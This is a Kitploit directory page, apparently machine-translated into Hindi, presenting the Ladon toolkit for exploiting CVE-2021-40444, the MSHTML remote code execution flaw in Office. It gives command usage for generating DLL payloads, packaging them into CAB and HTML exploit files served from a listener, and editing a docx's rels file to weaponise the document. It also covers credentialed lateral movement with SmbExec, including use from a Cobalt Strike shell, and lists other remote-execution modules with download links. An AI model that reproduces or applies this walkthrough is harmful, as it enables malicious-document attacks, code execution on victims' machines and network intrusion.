Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-40444 — CVE-2021-40444 MSHTML दूरस्थ कोड निष्पादन के लिए शोषण टूलकिट, जिसमें DLL पेलोड जनरेशन, Office दस्तावेज़ निर्माण, और पेनेट्रेशन परीक्षण के लिए पार्श्व गति मॉड्यूल (SmbExec, WmiExec) शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/k8gege/cve-2021-40444
पेलोड जनरेशनशोषणपार्श्व आंदोलनवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubk8gege/cve-2021-40444

CVE-2021-40444

CVE-2021-40444 MSHTML दूरस्थ कोड निष्पादन के लिए शोषण टूलकिट, जिसमें DLL पेलोड जनरेशन, Office दस्तावेज़ निर्माण, और पेनेट्रेशन परीक्षण के लिए पार्श्व गति मॉड्यूल (SmbExec, WmiExec) शामिल हैं।

रिपॉजिटरी देखें
22644 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

〖EXP〗Ladon CVE-2021-40444 Office भेद्यता पुनरुत्पादन

भेद्यता अवलोकन

बीजिंग समय 8 सितंबर को, ल्वमेंग टेक्नोलॉजी CERT ने देखा कि माइक्रोसॉफ्ट ने एक सुरक्षा सूचना जारी करते हुए Microsoft MSHTML रिमोट कोड निष्पादन भेद्यता का खुलासा किया। हमलावर एक दुर्भावनापूर्ण ActiveX नियंत्रण बना सकते हैं जिसका उपयोग ब्राउज़र रेंडरिंग इंजन होस्ट करने वाले Microsoft Office दस्तावेज़ों द्वारा किया जा सकता है। उपयोगकर्ता को दुर्भावनापूर्ण दस्तावेज़ खोलने के लिए सफलतापूर्वक लुभाने के बाद, लक्ष्य प्रणाली पर उपयोगकर्ता की अनुमतियों के साथ मनमाना कोड निष्पादित किया जा सकता है। माइक्रोसॉफ्ट ने सूचना में बताया कि इस भेद्यता का जंगली में शोषण होने का पता चला है, कृपया संबंधित उपयोगकर्ता सुरक्षा उपाय करें।

MSHTML (जिसे Trident भी कहा जाता है) माइक्रोसॉफ्ट का Internet Explorer ब्राउज़र इंजन है, और इसका उपयोग Office अनुप्रयोगों में Word, Excel या PowerPoint दस्तावेज़ों में वेब होस्ट की गई सामग्री प्रस्तुत करने के लिए भी किया जाता है। ActiveX नियंत्रण माइक्रोसॉफ्ट COM आर्किटेक्चर के तहत एक उत्पाद है, और इसका व्यापक रूप से विंडोज के Office सूट और IE ब्राउज़र में उपयोग किया जाता है। ActiveX नियंत्रण का उपयोग करके MSHTML घटकों के साथ बातचीत की जा सकती है।

प्रभावित संस्करण

इसमें Windows 7/8/8.1/10, Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022 शामिल हैं।

Ladon 8.9 अद्यतन सुविधाएँ

Ladon 8.9 2021.9.14 [+]CVE-2021-40444 Microsoft MSHTML रिमोट कोड निष्पादन भेद्यता, Office दस्तावेज़ शोषण मॉड्यूल प्रभावित संस्करण: Windows 7/8/8.1/10, Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022 शामिल हैं। [+]CmdDll cmd से DLL (विन सिस्टम 0day भेद्यता DLL निष्पादन कमांड पेलोड, सीधे PowerShell के माध्यम से CobaltStrike से जुड़ सकता है) ओवरफ्लो भेद्यता जैसे MS17010, स्थानीय विशेषाधिकार वृद्धि CVE-2021-1675 आदि, गैर-ओवरफ्लो जैसे नवीनतम Office भेद्यता CVE-2021-40444 आदि।

Ladon 8.8 2021.911 [+]SmbExec NTLM-HASH गैर-इंटरैक्टिव निष्पादन बिना आउटपुट के [u]GetInfo नई Vmware वर्चुअल मशीन जानकारी जोड़ी गई [u]OsScan नई Vigor Router राउटर पहचान जोड़ी गई [u]नई Xen\VBOX\Hybrid\Parallels वर्चुअल मशीन पहचान जोड़ी गई [+]GetInfo नई cmdkey, RrpLog, ड्राइवर स्थापना, सॉफ़्टवेयर सूची, हाल ही में एक्सेस की गई फ़ाइलें आदि जोड़ी गईं [+]GetInfo नई GUID, CPUID, हार्ड डिस्क ID, ऑटोस्टार्ट बैकडोर डिटेक्शन (DLL होल्डिंग, रजिस्ट्री आदि) जोड़ी गई [+]GetInfo2 नई WMI पैच जानकारी प्राप्त करना जोड़ा गया [+]डिफ़ॉल्ट जानकारी में C ड्राइव खाली स्थान की जानकारी 2GB से कम होने पर हाइलाइट चेतावनी जोड़ी गई

Ladon 8.9 मॉड्यूल उपयोग

CmdDLL उपयोग

root@kitploit:~
Usage:
Ladon CmdDll x86 calc
Ladon CmdDll x64 calc
Ladon CmdDll b64x86 YwBhAGwAYwA=
Ladon CmdDll b64x64 YwBhAGwAYwA=

कृपया आवश्यकता के अनुसार संबंधित CMD कमांड का उपयोग करके DLL उत्पन्न करें, उदाहरण के लिए कैलकुलेटर खोलना।

CVE-2021-40444 उपयोग

root@kitploit:~
Usage:
Ladon CVE-2021-40444 MakeCab poc.dll
Ladon CVE-2021-40444 MakeHtml http://192.168.1.8

PS: इस मॉड्यूल के लिए Ladon40.exe का उपयोग आवश्यक है।

CVE-2021-40444 पुनरुत्पादन

परीक्षण वातावरण

Win10 x64 Office 2019

Office 2019 स्थापित करना

कोई भी परीक्षण संस्करण लें, सक्रिय करने की आवश्यकता नहीं है। यदि डाउनलोड IMG है, तो IMG को ZIP में बदलें और निकालें और स्थापित करें।

CmdDll से dll उत्पन्न करना

CVE-2021-40444 MakeCab DLL को CAB में बदलना

चूंकि लक्ष्य Win10 X64 सिस्टम है, हम 64-बिट DLL का उपयोग करते हैं। आदेश: Ladon CVE-2021-40444 MakeCab sc64.dll

CVE-2021-40444 MakeHtml Poc.html उत्पन्न करना

HTML उत्पन्न करें, URL Ladon द्वारा सुनने वाले पते की ओर इंगित करना चाहिए।

वेब सुनना शुरू करें

doc नमूना संशोधन

नमूना 10 सितंबर को छोटे मंडल में भेजा गया था, docx एक्सटेंशन को cab या zip में बदलें, फिर rels फ़ाइल को संपादित करें, Ladon सुनने वाले पते poc.html की ओर इंगित करें, सहेजें और नाम बदलकर .docx करें।

परीक्षण एनिमेशन

Win10 पर doc फ़ाइल निष्पादित करते समय, Ladon सुनकर पूरी अनुरोध प्रक्रिया देखी जा सकती है। docx पहले html तक पहुंचता है, भेद्यता हमारे एन्कैप्सुलेटेड CAB फ़ाइल को लोड करने को ट्रिगर करती है, CPL के माध्यम से INF स्थापित करता है, हमारा DLL लोड करता है। DLL फ़ंक्शन कैलकुलेटर खोलने का प्रदर्शन करता है।

SmbExec उपयोग

root@kitploit:~
Load SmbExec
Usage:
Ladon SmbExec host user pass cmd whoami
Ladon SmbExec host user pass b64cmd dwBoAG8AYQBtAGkA

SmbExec निष्पादन

Cobalt Strike के शेल के तहत SmbExec निष्पादित करते समय, यदि पैरामीटर में स्पेस और उद्धरण हैं, तो CS एस्केप में समस्या है, सामान्य CMD कमांड का उपयोग करना मुश्किल है। इसलिए मैंने b64cmd पैरामीटर जोड़ा ताकि CS में उपयोग करना आसान हो (यह विधि कुछ महीने पहले BypassUac में उपयोग की गई थी, कई लोग नहीं जानते कि ऐसा क्यों करें, सीधे CMD कमांड अच्छा नहीं है, एक अतिरिक्त एन्क्रिप्शन की आवश्यकता क्यों? जब आपके CMD कमांड में बहुत सारे एस्केप हों तब आपको पता चलेगा, CS एस्केप से CMD एस्केप में बदलना मुश्किल है)। b64cmd कमांड LadonGUI 8.2 बाद के संस्करण में Base64Unicode एन्क्रिप्शन का उपयोग करके उत्पन्न किया जा सकता है।

निष्पादन परिणाम

Ladon के अन्य लैटरल मूवमेंट मॉड्यूल

IDमॉड्यूल नामकार्य विवरणउपयोग
1WmiExec135 पोर्ट पर कमांड निष्पादित करेंhttp://k8gege.org/Ladon/WinShell.html
2PsExec445 पोर्ट पर कमांड निष्पादित करेंhttp://k8gege.org/Ladon/WinShell.html
3AtExec445 पोर्ट पर कमांड निष्पादित करेंhttp://k8gege.org/Ladon/WinShell.html
4SshExec22 पोर्ट पर कमांड निष्पादित करेंhttp://k8gege.org/Ladon/WinShell.html
5JspShellJsp एक-लाइनर कमांड निष्पादित करेंhttp://k8gege.org/p/ladon_cs_shell.html
6WebShellWebShell कमांड निष्पादित करेंhttp://k8gege.org/Ladon/webshell.html
7WinrmExec5895 पोर्ट पर कमांड निष्पादित करेंhttp://k8gege.org/Ladon/WinrmExec.html
8SmbExec445 पोर्ट HASH कमांड निष्पादित करेंhttp://k8gege.org/Ladon/SmbExec.html

Ladon डाउनलोड

PowerLadon: https://github.com/k8gege/PowerLadon पुराने संस्करण: http://github.com/k8gege/Ladon/releases 7.0 संस्करण: http://k8gege.org/Download 8.9 संस्करण: K8 लघु मंडल

टूल डाउनलोड करें